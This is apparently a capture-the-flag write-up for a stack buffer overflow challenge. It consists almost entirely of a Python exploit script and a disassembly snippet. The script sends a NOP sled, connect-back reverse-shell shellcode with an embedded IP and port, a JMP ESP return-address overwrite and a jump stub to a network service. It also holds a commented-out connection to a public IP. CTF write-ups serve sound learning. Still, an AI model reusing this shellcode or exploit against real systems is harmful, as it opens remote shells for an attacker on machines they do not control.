Just use JMP ESP.
I don't have my own server, so I borrowed a friend's server and solved it with a reverse shellcode.
```asm
080483dc <main>:
 80483dc:	8d 7f 06             	lea    0x6(%edi),%edi
 80483df:	ff e7                	jmp    *%edi
```
```python
#!/usr/bin/env python
#-*-coding:utf8-*-
from socket import *
from struct import *

p = lambda x : pack("<L", x)

s = socket(AF_INET, SOCK_STREAM)
#s.connect(("54.163.248.69", 9000))
s.connect(("localhost", 9000))

# connect-back shellcode
SHELLCODE = (
    "\x68"
    "\x7f\x01\x01\x01"  # IP ADDRESS (a different IP was used during the competition)
    "\x5e\x66\x68"
    "\xd9\x03"          # PORT NUMBER
    "\x5f\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02"
    "\x89\xe1\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79"
    "\xf9\xb0\x66\x56\x66\x57\x66\x6a\x02\x89\xe1\x6a"
    "\x10\x51\x53\x89\xe1\xcd\x80\xb0\x0b\x52\x68\x2f"
    "\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
    "\xeb\xce"
)

JMPESP = p(0x080488B0)                 # address of the jmp esp gadget in the binary
JMPEDI = "\x8d\x7f\x06\xff\xe7"        # lea 0x6(%edi),%edi ; jmp *%edi (see disassembly above)

print "[*] exploit start"
s.recv(4096)
payload = "\x90" * (118 - len(SHELLCODE))   # NOP sled pads the buffer to 118 bytes
payload += SHELLCODE
payload += JMPESP                           # overwrites the saved return address
payload += JMPEDI                           # lands at ESP after ret, reached via jmp esp
s.send("echo\x20" + payload + "\n")
print "[*] end"
```